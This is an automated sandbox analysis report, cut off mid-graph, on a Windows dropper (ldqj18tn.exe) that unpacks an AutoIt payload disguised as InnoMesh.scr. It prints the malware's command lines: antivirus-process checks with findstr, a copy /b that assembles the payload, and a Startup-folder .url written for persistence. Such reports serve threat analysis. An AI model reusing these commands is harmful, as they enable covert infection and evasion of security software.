Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: ldqj18tn.exeStatic file information: File size 1656911 > 1048576
Source: ldqj18tn.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00278B75 push ecx; ret 11_2_00278B88
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00218B75 push ecx; ret 17_2_00218B88
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0020CBDB push eax; retf 17_2_0020CBF8
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0020CC06 push eax; retf 17_2_0020CBF8

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifFile created: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifFile created: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.urlJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.urlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002D59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_002D59B3
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00265EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00265EDA
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_002759B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,17_2_002759B3
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00205EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,17_2_00205EDA
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002733B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_002733B7
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifAPI coverage: 4.9 %
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrAPI coverage: 4.7 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002B4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_002B4005
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002B494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_002B494A
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002B3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_002B3CE2
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002BC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_002BC2FF
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002BCD14 FindFirstFileW,FindClose,11_2_002BCD14
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002BCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_002BCD9F
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002BF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_002BF5D8
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002BF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_002BF735
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002BFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_002BFA36
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00254005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00254005
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0025494A GetFileAttributesW,FindFirstFileW,FindClose,17_2_0025494A
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0025C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_0025C2FF
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0025CD14 FindFirstFileW,FindClose,17_2_0025CD14
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0025CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,17_2_0025CD9F
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0025F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0025F5D8
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0025F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0025F735
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0025FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_0025FA36
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00253CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00253CE2
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00265D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00265D13
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\704579\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\704579Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: InnoMesh.scr, 00000011.00000002.2554247186.0000000004147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu](
Source: Organizational.pif, 0000000B.00000002.2553979923.0000000003F12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002C45D5 BlockInput,11_2_002C45D5
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00265240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00265240
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00285CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_00285CAC
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002A88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_002A88CD
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_0027A354 SetUnhandledExceptionFilter,11_2_0027A354
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_0027A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0027A385
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0021A354 SetUnhandledExceptionFilter,17_2_0021A354
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0021A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0021A385
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002A9369 LogonUserW,11_2_002A9369
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00265240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00265240
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002B1AC6 SendInput,keybd_event,11_2_002B1AC6
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002B51E2 mouse_event,11_2_002B51E2
Source: C:\Users\user\Desktop\ldqj18tn.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 704579Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "MARTNMSPIDERRINGTONE" Mh Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Consequence + ..\Gently + ..\Situations + ..\International + ..\Jet + ..\Commodities + ..\Mood + ..\Fastest + ..\Estimate + ..\Jessica + ..\Prof + ..\Becoming + ..\Princess + ..\Required + ..\Traveller + ..\Against uJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\704579\Organizational.pif Organizational.pif uJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr "C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr" "C:\Users\user\AppData\Local\TechMesh Dynamics\M"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innomesh.url" & echo url="c:\users\user\appdata\local\techmesh dynamics\innomesh.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innomesh.url" & exit
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innomesh.url" & echo url="c:\users\user\appdata\local\techmesh dynamics\innomesh.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innomesh.url" & exitJump to behavior
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002A88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_002A88CD
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002B4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,11_2_002B4F1C
Source: ldqj18tn.exe, 00000000.00000003.1297854644.0000000002950000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.1355386865.000000000467F000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000000.1344740654.0000000000306000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Organizational.pif, InnoMesh.scrBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_0027885B cpuid 11_2_0027885B
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00290030 GetLocalTime,__swprintf,11_2_00290030
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_00290722 GetUserNameW,11_2_00290722
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_0028416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,11_2_0028416A
Source: C:\Users\user\Desktop\ldqj18tn.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: InnoMesh.scrBinary or memory string: WIN_81
Source: InnoMesh.scrBinary or memory string: WIN_XP
Source: InnoMesh.scrBinary or memory string: WIN_XPe
Source: InnoMesh.scrBinary or memory string: WIN_VISTA
Source: InnoMesh.scrBinary or memory string: WIN_7
Source: InnoMesh.scrBinary or memory string: WIN_8
Source: InnoMesh.scr.11.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002C696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_002C696E
Source: C:\Users\user\AppData\Local\Temp\704579\Organizational.pifCode function: 11_2_002C6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_002C6E32
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_0026696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,17_2_0026696E
Source: C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrCode function: 17_2_00266E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,17_2_00266E32
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information11
Scripting
2
Valid Accounts
1
Windows Management Instrumentation
11
Scripting
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
21
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Native API
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol21
Input Capture
1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Command and Scripting Interpreter
2
Valid Accounts
2
Valid Accounts
2
Obfuscated Files or Information
Security Account Manager3
File and Directory Discovery
SMB/Windows Admin Shares3
Clipboard Data
1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder
21
Access Token Manipulation
1
DLL Side-Loading
NTDS17
System Information Discovery
Distributed Component Object ModelInput Capture1
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection
111
Masquerading
LSA Secrets31
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder
2
Valid Accounts
Cached Domain Credentials4
Process Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Access Token Manipulation
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
Process Injection
Proc Filesystem1
System Owner/User Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577511 Sample: ldqj18tn.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 84 57 zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq 2->57 63 Multi AV Scanner detection for submitted file 2->63 65 Sigma detected: Search for Antivirus process 2->65 67 Sigma detected: Drops script at startup location 2->67 69 2 other signatures 2->69 10 ldqj18tn.exe 30 2->10         started        14 wscript.exe 1 2->14         started        signatures3 process4 file5 49 C:\Users\user\AppData\Local\Temp\Becoming, DOS 10->49 dropped 51 C:\Users\user\AppData\Local\Temp\Traveller, data 10->51 dropped 53 C:\Users\user\AppData\Local\Temp\Situations, data 10->53 dropped 55 13 other malicious files 10->55 dropped 75 Writes many files with high entropy 10->75 16 cmd.exe 3 10->16         started        77 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->77 20 InnoMesh.scr 14->20         started        signatures6 process7 file8 37 C:\Users\user\AppData\...\Organizational.pif, PE32 16->37 dropped 59 Drops PE files with a suspicious file extension 16->59 61 Writes many files with high entropy 16->61 22 Organizational.pif 4 16->22         started        26 cmd.exe 2 16->26         started        28 conhost.exe 16->28         started        30 7 other processes 16->30 signatures9 process10 file11 41 C:\Users\user\AppData\Local\...\InnoMesh.scr, PE32 22->41 dropped 43 C:\Users\user\AppData\Local\...\M, data 22->43 dropped 45 C:\Users\user\AppData\Local\...\InnoMesh.js, ASCII 22->45 dropped 71 